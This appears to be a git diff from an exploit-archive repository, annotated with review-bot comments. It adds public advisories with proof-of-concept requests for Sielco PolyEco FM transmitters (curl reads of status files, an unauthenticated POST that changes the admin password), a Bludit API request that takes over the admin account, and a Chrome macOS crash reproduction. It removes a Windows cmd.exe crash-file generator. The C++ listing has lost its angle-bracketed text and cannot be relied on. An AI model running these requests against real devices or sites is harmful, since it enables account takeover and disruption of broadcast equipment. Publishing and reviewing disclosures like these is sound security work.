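Review bot: The captured request is not shown in a form that can be read as an HTTP message: there is no `Content-Type`, `Content-Length` or `Cookie` header, the parameters are listed one per line, several keys appear without `=` (`rds_rtb`, `rds_psd1`) and some appear twice with different values (`rds_tp=0` / `rds_tp=1`). Because the Desc claims both an authorization bypass and missing request validation, the entry should say explicitly whether this POST was sent with no session cookie at all or from an authenticated browser without an anti-CSRF token, since the mitigation differs. A one-line note above the request, e.g. `# Sent without any session cookie; body shown one field per line for readability`, would remove the ambiguity if that is what was tested.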
diff --git a/exploits/hardware/webapps/51370.txt b/exploits/hardware/webapps/51370.txt
new file mode 100644
index 000000000..5f093f6ab
--- /dev/null
+++ b/exploits/hardware/webapps/51370.txt
@@ -0,0 +1,67 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Sielco PolyEco is affected by an information disclosure
+vulnerability due to improper access control enforcement. An
+unauthenticated remote attacker can exploit this, via a specially
+crafted request to gain access to sensitive information.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5766
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
+
+
+26.01.2023
+
+--
+
+
+$ curl -s http://RADIOFM/factory.ssi
+$ curl -s http://RADIOFM/rds.ssi
+$ curl -s http://RADIOFM/ip.ssi
+$ curl -s http://RADIOFM/alarm.ssi
+$ curl -s http://RADIOFM/i2s.ssi
+$ curl -s http://RADIOFM/time.ssi
+$ curl -s http://RADIOFM/fft.ssi
+$ curl -s http://RADIOFM/info.ssi
+$ curl -s http://RADIOFM/status.ssi
+$ curl -s http://RADIOFM/statusx.ssi
+$ curl -s http://RADIOFM/audio.ssi
+$ curl -s http://RADIOFM/smtp.ssi
+$ curl -s http://RADIOFM/rf.ssi
+$ curl -s http://RADIOFM/rfa.ssi
+$ curl -s http://RADIOFM/ping.ssi
+$ curl -s http://RADIOFM/lan.ssi
+$ curl -s http://RADIOFM/kappa.ssi
+$ curl -s http://RADIOFM/dbrt.ssi
+$ curl -s http://RADIOFM/audiom.ssi
+$ curl -s http://RADIOFM/log.ssi
\ No newline at end of file
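Review bot: The proof section is a bare list of twenty `.ssi` requests with no indication of what any of them returns, so the "sensitive information" in the Desc cannot be assessed for severity. Add, per endpoint or per group, the class of data exposed (with values redacted), and state that the requests were made without a session. It is also worth recording that these paths sit at the web root rather than under `/protect/`, which, if the firmware applies access control by path prefix, would point to where the fix belongs; that is an inference from the URLs, not something this file shows.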
diff --git a/exploits/hardware/webapps/51371.txt b/exploits/hardware/webapps/51371.txt
new file mode 100644
index 000000000..77f443866
--- /dev/null
+++ b/exploits/hardware/webapps/51371.txt
@@ -0,0 +1,54 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
+## Exploit Author: LiquidWorm
+
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: The application suffers from an authentication bypass,
+account takeover/lockout and elevation of privileges vulnerability
+that can be triggered by directly calling the users object and
+effectively modifying the password of the two constants user/role
+(user/admin). This can be exploited by an unauthenticated adversary
+by issuing a single POST request to the vulnerable endpoint and
+gain unauthorized access to the affected device with administrative
+privileges.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5765
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php
+
+
+26.01.2023
+
+--
+
+
+# Change admin pwd
+$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
\ No newline at end of file
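Review bot: The advisory has no line on fix status or mitigation, although the Chrome entry added in the same commit carries a `Fixed version:` field; adding `Fixed version: <vendor fix status, placeholder>` after the `Affected version:` list would tell operators whether anything newer than CPU:2.0.6 is safe. Since the Desc states that a single unauthenticated POST to the users object changes both passwords, a short defensive note would help as well: keep the transmitter's web interface off untrusted networks and treat any POST to `/protect/users.htm` in proxy or firewall logs as a password-change event to verify. The `# Change admin pwd` comment also understates the request, which submits an empty `pwd_user` too; whether that blanks or locks the user account is not shown here, so the comment should say which.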
diff --git a/exploits/macos/local/51361.txt b/exploits/macos/local/51361.txt
new file mode 100644
index 000000000..c30ce70f0
--- /dev/null
+++ b/exploits/macos/local/51361.txt
@@ -0,0 +1,319 @@
+## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
+## Exploit Author: LiquidWorm
+
+Vendor: Google LLC
+Product web page: https://www.google.com
+Affected version: 111.0.5563.64 (Official Build) (x86_64)
+ 110.0.5481.100 (Official Build) (x86_64)
+ 108.0.5359.124 (Official Build) (x86_64)
+ 108.0.5359.98 (Official Build) (x86_64)
+Fixed version: 112.0.5615.49 (Official Build) (x86_64)
+
+Summary: Google Chrome browser is a free web browser used for
+accessing the internet and running web-based applications. The
+Google Chrome browser is based on the open source Chromium web
+browser project. Google released Chrome in 2008 and issues several
+updates a year.
+
+Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
+tabs on macOS.
+
+Commit fix:
+
+"The original cl landed many months ago, but
+chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
+is the only change that didn't revert cleanly."
+
+macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
+
+Implements accessibility hit testing for RemoteCocoa so that Hover Text
+and VoiceOver mouse mode can read the accessible objects under the
+user's pointer. Cross-process plumbing was needed because RemoteCocoa
+bridges to native controls in a separate app shim process and must
+report accessibility trees from the browser process via the
+undocumented NSAccessibilityRemoteUIElement mechanism.
+
+This CL does the following:
+
+1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
+ in the browser process. This enables the browser process to accept
+ redirected accessibilityHitTest calls to the object corresponding to
+ any NSAccessibilityRemoteUIElement returned by the original
+ accessibilityHitTest at the app shim process.
+
+2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
+ accessibilityHitTest to have a custom implementation with
+ NSAccessibilityRemoteUIElement support so that custom window
+ controls can be found. Additionally, adjusts the BrowserView bounds
+ so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
+ support view targeting) can return controls in the web app frame
+ toolbar.
+
+3. (For Web Content) Implements RenderWidgetHostViewCocoa's
+ accessibilityHitTest for instances in the app shim to return a
+ NSAccessibilityRemoteUIElement corresponding to their counterparts
+ in the browser process so that web content objects can be found.
+
+
+Tested on: macOS 12.6.1 (Monterey)
+ macOS 13.3.1 (Ventura)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5770
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
+
+
+08.12.2022
+
+--
+
+
+UI PoC:
+-------
+1. Grab a tab and detach it.
+2. Bring back the tab.
+3. Do this 2-3 times attaching / re-attaching the tab.
+4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
+5. Process crashes entirely.
+
+Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
+Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
+Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
+Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
+
+=============
+//
+// Copyright (c) Microsoft Corporation. All rights reserved.
+//
+
+#include
+
+#include
+#include
+#include
+
+__BEGIN_DECLS
+ // NOLINTNEXTLINE
+ AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
+ // NOLINTNEXTLINE
+ CFTypeID AXTextMarkerGetTypeID();
+__END_DECLS
+
+std::ostream& bold_on(std::ostream& os)
+{
+ if (isatty(STDOUT_FILENO))
+ {
+ return os << "\e[1m";
+ }
+ return os;
+}
+
+std::ostream& bold_off(std::ostream& os)
+{
+ if (isatty(STDOUT_FILENO))
+ {
+ return os << "\e[0m";
+ }
+ return os;
+}
+
+std::string from_cfstr(CFTypeRef cf_ref)
+{
+ if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
+ {
+ const auto cf_str = static_cast(cf_ref);
+ const auto max_length = static_cast(CFStringGetMaximumSizeForEncoding(
+ CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
+
+ auto result = std::string(max_length, '\0');
+ if (CFStringGetCString(cf_str, result.data(), static_cast(max_length), kCFStringEncodingUTF8))
+ {
+ if (const auto pos = result.find('\0'); pos != std::string::npos)
+ {
+ result.resize(pos);
+ }
+ return result;
+ }
+ }
+ return {};
+}
+
+std::string ax_element_id(AXUIElementRef value)
+{
+ // AX element cache - AX elements are backed by CFData
+ // (referring to 'remote' AX objects) and this data is
+ // 'stable' across 'volatile' instances of AXUIElement.
+ // 'hash and equality' of AX elements are based on this
+ // data and therefore, we can use AXUIElement objects as
+ // 'keys' in a dictionary with values, identifying these
+ // objects (uniquely).
+ const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
+ &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
+
+ auto ax_id = CFDictionaryGetValue(ax_elements, value);
+
+ if (ax_id == nullptr)
+ {
+ if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
+ {
+ if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
+ {
+ CFDictionarySetValue(ax_elements, value, uuid_s);
+
+ CFRelease(uuid_s);
+ }
+ CFRelease(uuid);
+ }
+
+ ax_id = CFDictionaryGetValue(ax_elements, value);
+ }
+
+ return from_cfstr(ax_id);
+}
+
+template
+T ax_attribute_value(AXUIElementRef e, CFStringRef name)
+{
+ if (e != nullptr)
+ {
+ auto ref = T{};
+ if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
+ {
+ return ref;
+ }
+ }
+ return nullptr;
+}
+
+// NOLINTNEXTLINE
+void ax_traverse(AXUIElementRef elem, uint32_t depth)
+{
+ const auto max_depth = 10;
+ if (depth > max_depth)
+ {
+ return;
+ }
+
+ const auto indent = [&]()
+ {
+ for (auto x = 0; x < depth; x++)
+ {
+ std::cout << " ";
+ }
+ };
+
+ auto wid = CGWindowID{};
+ if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
+ {
+ wid = 0;
+ }
+
+ indent();
+ const auto role = ax_attribute_value(elem, kAXRoleAttribute);
+
+ std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
+ ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
+ std::endl;
+
+ if (const auto children = ax_attribute_value(elem, kAXChildrenAttribute))
+ {
+ for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
+ {
+ const auto element = static_cast(CFArrayGetValueAtIndex(children, idx));
+ ax_traverse(element, depth + 1);
+ }
+ CFRelease(children);
+ }
+}
+
+int main(int argc, char* const argv[])
+{
+ auto pid = 0;
+
+ if (argc > 1)
+ {
+ if (!AXIsProcessTrusted())
+ {
+ std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
+ exit(1); // NOLINT
+ }
+ // NOLINTNEXTLINE
+ pid = std::stoi(argv[1]);
+ }
+ else
+ {
+ std::cerr << "usage: axtester " << std::endl;
+ exit(1); // NOLINT
+ }
+
+ if (const auto app = AXUIElementCreateApplication(pid))
+ {
+ auto observer = AXObserverRef{};
+ auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
+ {
+ auto myapp = (__AXUIElement*)(ctx);
+ auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
+ std::cout << "Hint: " << hint << std::endl;
+ ax_traverse(myapp, 0);
+ }, &observer);
+
+ if (kAXErrorSuccess != ret)
+ {
+ std::cerr << "Fail to create observer" << std::endl;
+ return -1;
+ }
+
+ std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
+ std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
+ std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
+ std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
+ std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
+ std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
+ std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
+ CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
+ CFRunLoopRun();
+ }
+
+ return 0;
+}
+
+--codeaibot explains--
+
+This is a C++ program that uses the Accessibility API (AX) provided
+by macOS to traverse the user interface of a running application and
+print out information about the accessibility elements that it finds.
+
+The program takes a single argument, which is the process ID (PID) of
+the application to examine. If no argument is provided, the program
+displays a usage message and exits.
+
+The main() function first checks if the Terminal app has been granted
+accessibility privileges by calling the AXIsProcessTrusted() function.
+If it hasn't, the program displays an error message and exits.
+
+If the Terminal app has been granted accessibility privileges, the program
+creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
+function, passing in the PID as an argument.
+
+The ax_traverse() function is then called with the root accessibility
+element of the application as an argument. This function recursively
+traverses the accessibility tree of the application, printing out
+information about each element it encounters.
+
+The program also defines several helper functions for working with Core
+Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
+as well as some functions for printing formatted output to the console
+(bold_on() and bold_off()).
+
+-- / --
+
+As this issue is not a security issue nor results in security consequences,
+this report is not eligible for a VRP reward.
+
+++
+Thank you Amy!
+--
\ No newline at end of file
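Review bot: In the AXObserverCreate callback inside main(), the result of `CFStringGetCStringPtr(name,kCFStringEncodingUTF8)` is streamed without a null check; that call is documented to return NULL when the string has no directly usable C buffer, and inserting a null `const char*` into `std::cout` is undefined behaviour (commonly it sets badbit and silences all later output). The file's own helper already covers this case, so the line can become `std::cout << "Hint: " << from_cfstr(name) << std::endl;`. Separately, `role` in ax_traverse is obtained through AXUIElementCopyAttributeValue and is never passed to CFRelease, unlike `children`, so each visited element leaks one reference. As shown here the listing has also lost its angle-bracketed text (bare `#include`, `template` with no parameter list, `static_cast(` with no type), so it would not compile as committed; that is worth checking against the original attachment.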
diff --git a/exploits/php/webapps/51360.txt b/exploits/php/webapps/51360.txt
new file mode 100644
index 000000000..7cedabf2e
--- /dev/null
+++ b/exploits/php/webapps/51360.txt
@@ -0,0 +1,90 @@
+## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
+## Author: nu11secur1ty
+## Date: 04.11.2013
+## Vendor: https://www.bludit.com/
+## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
+## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
+## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
+
+## Description:
+The already authenticated attacker can send a normal request to change
+his password and then he can use
+the same JSON `object` and the vulnerable `API token KEY` in the same
+request to change the admin account password.
+Then he can access the admin account and he can do very malicious stuff.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```PUT
+PUT /api/users/admin HTTP/1.1
+Host: 127.0.0.1:8000
+Content-Length: 138
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-platform: "Windows"
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
+Safari/537.36
+content-type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8000
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:8000/admin/edit-user/pwned
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
+Connection: close
+
+{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
+
+```
+
+[+]Response:
+```HTTP
+HTTP/1.1 200 OK
+Host: 127.0.0.1:8000
+Date: Tue, 11 Apr 2023 08:33:51 GMT
+Connection: close
+X-Powered-By: PHP/7.4.30
+Access-Control-Allow-Origin: *
+Content-Type: application/json
+
+{"status":"0","message":"User edited.","data":{"key":"admin"}}
+```
+
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
+
+## Proof and Exploit:
+[href](https://streamable.com/w3aa4d)
+
+## Time spend:
+00:57:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
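Review bot: The `## Date: 04.11.2013` header does not agree with the rest of the entry: the captured response is dated `Tue, 11 Apr 2023`, the User-Agent is Chrome 112, and the index row added in this commit publishes it on 2023-04-14, so the year looks like a typo for 2023. The signature block also appears twice at the end of the file, the first copy with two URLs fused into `https://cve.mitre.org/index.htmlhttps://cxsecurity.com/`; one clean copy is enough. For readers who have to fix or triage this, the description would be more useful with one sentence on the root cause: the request body names `username` `pwned` while the path is `/api/users/admin`, which suggests the API does not tie the supplied token to the account being edited, but the advisory never states that.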
diff --git a/exploits/windows/dos/51348.txt b/exploits/windows/dos/51348.txt
deleted file mode 100644
index 491938dcd..000000000
--- a/exploits/windows/dos/51348.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
-# Exploit Author: Milad Karimi (Ex3ptionaL)
-# Date: 2023-03-30
-# Vendor Homepage: https://www.microsoft.com/en-us
-# Software Link: https://www.microsoft.com/en-us
-# Tested Version: N/A
-# Tested on OS: Windows 11 Pro
-
-# [ About App ]
-
-Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
-
-An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
-
-This issue affects Microsoft Windows 11 Pro.
-
-Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
-
-
-# [ POC ]
-
-# 1.Run the python script, it will create a new file "PoC.txt"
-# 2.Run Command Prompt
-# 3.Copy the content of the file "PoC.txt"
-# 4.Paste the content of dos.txt into the lin cmd.exe
-# 5.Crashed ;)
-
-#!/usr/bin/env python
-buffer = "A" * 339839907
-payload = buffer
-try:
- f=open("PoC.txt","w")
- print "[+] Creating %s evil payload.." %len(payload)
- f.write(payload)
- f.close()
- print "[+] File created!"
-except:
- print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f788a75a3..3ff01acf6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1123,6 +1123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30380,,,,,https://www.securityfocus.com/bid/21043/info
28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30381,,,,,https://www.securityfocus.com/bid/21043/info
11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp,,2010-02-11,,0,OSVDB-62338,,,,,
+51362,exploits/asp/webapps/51362.txt,"InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal",2023-04-14,Zer0FauLT,webapps,asp,,2023-04-14,2023-04-14,0,,,,,,
29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32852,,,,,https://www.securityfocus.com/bid/22052/info
29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32853,,,,,https://www.securityfocus.com/bid/22052/info
30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp,,2007-12-31,2014-01-15,1,CVE-2007-6671;OSVDB-39766,,,,,https://www.securityfocus.com/bid/27080/info
@@ -3863,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
+51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware,,2009-01-24,,1,,,,,,
24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware,,2004-04-27,2013-01-13,1,CVE-2004-2626;OSVDB-5703,,,,,https://www.securityfocus.com/bid/10227/info
38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102,2015-12-14,2015-12-14,0,,"Metasploit Framework (MSF)",,,,
@@ -4716,6 +4718,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,,2013-06-05,2016-12-05,0,OSVDB-94103,,,,,
44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,,2018-06-12,2018-06-12,0,,,,,,https://blog.spaceduck.io/siaberry-1/
48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,,2020-07-07,2020-07-07,0,,,,,,
+51363,exploits/hardware/webapps/51363.txt,"Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51364,exploits/hardware/webapps/51364.txt,"Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51365,exploits/hardware/webapps/51365.txt,"Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51371,exploits/hardware/webapps/51371.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51367,exploits/hardware/webapps/51367.py,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51368,exploits/hardware/webapps/51368.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51369,exploits/hardware/webapps/51369.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51370,exploits/hardware/webapps/51370.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware,,2013-05-13,2013-05-13,0,OSVDB-93263,,,,,https://www.vulnerability-lab.com/get_content.php?id=937
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-10-28,0,,,,,,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-04-23,0,,,,,,
@@ -9099,6 +9109,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,,2018-07-30,2018-07-30,0,CVE-2017-15358,Local,,,,https://m4.rkw.io/blog/cve201715358-local-root-privesc-in-charles-proxy-42.html
46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,,2019-04-18,2019-04-18,0,CVE-2019-10038,Traversal,,,,https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",2022-02-02,LiquidWorm,local,macos,,2022-02-02,2022-02-02,0,,,,,,
+51361,exploits/macos/local/51361.txt,"Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)",2023-04-14,LiquidWorm,local,macos,,2023-04-14,2023-04-14,0,,,,,,
